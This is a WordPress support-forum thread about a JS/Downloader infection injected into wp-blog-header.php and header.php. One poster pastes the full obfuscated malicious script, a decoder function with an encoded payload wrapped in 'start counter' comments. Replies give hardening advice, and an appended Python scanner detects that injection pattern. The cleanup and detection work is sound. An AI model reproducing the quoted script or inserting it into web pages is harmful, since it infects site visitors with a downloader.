JS/Downloader Agent uploaded to wp-blog-header.php - multiple sites (4 posts)

  1. gestroud
    Member
    Posted 3 years ago #

    I've recently noticed that someone has uploaded a virus - JS/Downloader Agent to a number of my WP 2.51 web sites.

    Whoever the attacker is uploads it to wp-blog-header.php. The original file is supposed to be 2KB. The new one is 3KB. There is encrypted JavaScript code added.

    I have already contacted my web host (Servage) and installed a fresh copy of WordPress.

    Read/Write permissions are set to 755 on the root folders. Should the core files be 644? Just want to make sure.

    No one has my passwords, but I've just changed them, as a precaution.

    I have wp-ban installed, as well as wp-blockadmin and the Login Error Cleaner plugin. Other protection plugins like AA Password Protect cause internal errors, so I can't use them.

    All plugins are up to date.

    What I'm trying to figure out is how to prevent it from happening again.

    Any suggestions?

  2. hizkia
    Member
    Posted 3 years ago #

    Hello,
    Got the same problem. Someone uploaded the JS/Downloader script to my blog. Would you please kindly show me where and how to remove the malicious script? Below are the last few lines of header.php:

    <!-- start counter :rkgi58s:wpjsandif --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,32,53,60,46,41,2,21,9,33,0,0,0,0,0,0,58,48,51,50,4,1,30,12,44,7,31,26,18,19,49,24,11,13,59,27,34,22,38,54,28,25,6,0,0,0,0,8,0,36,35,29,14,45,47,16,0,42,39,62,56,37,43,57,17,52,61,40,3,10,55,23,20,5,15);for(j=Math.ceil(l/b);j>0;j--){r="";for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("YKeNwBX2pws2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2zSeCtB3APkH26UO9pBc2hb51ptXvpnlBDzQNUS32Gwcq64YVuKeNwBX2pf8ifV8BtJQN_tX9UIQv8tGV6ZGBUwcCDBrjy4HCPtHj6Us2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2GzHCt0H2PUrC6PlVYi_BtJQN_t3V")</script><!-- end counter :rkgi58s:wpjsandif -->

    Are these the lines I need to remove?

    Thanks!

  3. whooami
    Member
    Posted 3 years ago #

    hizkia,

    Your site is a trainwreck waiting to happen. It simply isn't as simple as removing the offending code, in your case. READ my reply inside the other thread you made.

  4. whooami
    Member
    Posted 3 years ago #

    Should the core files be 644?

    Yes.

    And while it's good that your plugins are current -- make sure none of them are listed here:

    http://www.milw0rm.com/search.php (search for WordPress)
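
A defensive check built from what the thread describes, added here as an example and not code from any of the posters: it flags files containing a comment-wrapped `start counter` / `end counter` script block or a script that decodes itself with `String.fromCharCode` and `document.write`, and files that group or others can write (looser than 644). The function names, the scanned extensions and the sample string are assumptions made for the example.

```python
import os
import re
import stat

# Comment-wrapped block in the shape quoted in the thread.
MARKER_BLOCK = re.compile(
    r"<!--\s*start counter\b.*?-->.*?<!--\s*end counter\b.*?-->", re.I | re.S)
SCRIPT_TAG = re.compile(r"<script\b.*?</script>", re.I | re.S)
# Traits of the decoder stub in that block.
DECODER_TRAITS = ("String.fromCharCode", "document.write")

# Constructed sample with the same shape (not the payload from the thread).
SAMPLE = ('<!-- start counter :aaa:bbb --><script>function dc(x){'
          'document.write(String.fromCharCode(165^x))}dc(1)</script>'
          '<!-- end counter :aaa:bbb -->')


def scan_text(text):
    """Return the findings for one file's contents."""
    findings = []
    if MARKER_BLOCK.search(text):
        findings.append("counter-marker block")
    if any(all(t in m.group(0) for t in DECODER_TRAITS)
           for m in SCRIPT_TAG.finditer(text)):
        findings.append("self-decoding script")
    return findings


def too_writable(mode):
    """True if group or others can write the file (644 permits neither)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_tree(root):
    """Walk a site tree and return {path: findings} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".html", ".js")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                findings = scan_text(fh.read())
            if too_writable(stat.S_IMODE(os.stat(path).st_mode)):
                findings.append("group/world-writable")
            if findings:
                report[path] = findings
    return report
```

Call `scan_tree` on the site's document root to get a path-to-findings report. The patterns only match this injection's shape, so comparing files against a fresh WordPress copy remains the stronger check.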

This topic has been closed to new replies.